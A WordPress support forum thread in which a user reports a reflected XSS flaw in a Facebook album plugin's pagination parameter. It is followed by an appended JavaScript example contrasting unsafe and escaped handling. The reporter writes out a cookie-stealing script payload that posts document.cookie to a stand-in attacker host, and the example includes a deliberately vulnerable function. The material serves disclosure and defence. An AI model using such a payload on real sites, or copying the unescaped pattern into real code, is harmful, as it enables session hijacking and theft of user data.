• Resolved AndyErnst

    (@andyernst)


    A security audit of my site turned up a vulnerability in this plugin. The plugin reads the query string from the URL (for pagination) and seems to add it to the DOM without escaping or cleansing. Someone could use this to inject script tags onto the page and steal user data and cookies.

    We had to remove the plugin from our site but thought you should know about this issue.

    https://www.ads-software.com/plugins/srizon-facebook-album/

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author afzal_du

    (@afzal_du)

    Thanks for pointing it out.
    1. The DB is safe since the URL params are not used for DB queries.
    2. I’m not sure how one user can inject script and steal other users’ data using a URL parameter, then again I’m not a hacker.
    However, it’s best to sanitize data and I’ll do that in the next version.

    Thread Starter AndyErnst

    (@andyernst)

    Yes, the DB is safe but a hacker could make a user click a link going to a page with a srizon album on it, and if that link has something like this in it <script>jQuery.post(badsite, document.cookie);</script> they could send the user’s cookies from that site to a different site.

    Plugin Author afzal_du

    (@afzal_du)

    Understood!
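The issue discussed in this thread, as an added example that is not the plugin's own code: a pagination value taken from the query string is put into the page markup, first unescaped (the reflected XSS the audit reported) and then validated and escaped. The parameter name `album_page`, the URLs and the markup are constructed for illustration; it runs under Node.js.

```javascript
// Added example (not the plugin's code): a pagination parameter read from the
// query string and placed into markup, unsafe vs. hardened.
// The parameter name, URLs and markup below are constructed for illustration.

// Minimal HTML escaping for text placed inside element content.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Hypothetical parameter name; the plugin's real name is not given in the thread.
const PAGE_PARAM = 'album_page';

// Unsafe: the raw parameter is concatenated into markup, so a crafted link
// ends up as a script element in the rendered page.
function paginationUnsafe(url) {
  const page = new URL(url).searchParams.get(PAGE_PARAM) || '1';
  return '<div class="pagination">Page ' + page + '</div>';
}

// Hardened: accept only a positive integer (falling back to page 1), and still
// escape whatever is written into the markup as a second line of defence.
function paginationSafe(url) {
  const raw = new URL(url).searchParams.get(PAGE_PARAM) || '1';
  const page = /^\d{1,6}$/.test(raw) ? Number(raw) : 1;
  return '<div class="pagination">Page ' + escapeHtml(page) + '</div>';
}

// Detection helper: does the rendered markup contain a script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed samples: a benign pagination link and one carrying a harmless probe payload.
const benignUrl = 'https://example.test/gallery/?album_page=3';
const hostileUrl = 'https://example.test/gallery/?album_page=' +
  encodeURIComponent('<script>alert(1)</script>');
```

`paginationUnsafe(hostileUrl)` reproduces the audit finding (a script element in the output), while `paginationSafe(hostileUrl)` renders page 1 with no script element.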

  • The topic ‘Security issue with query strings’ is closed to new replies.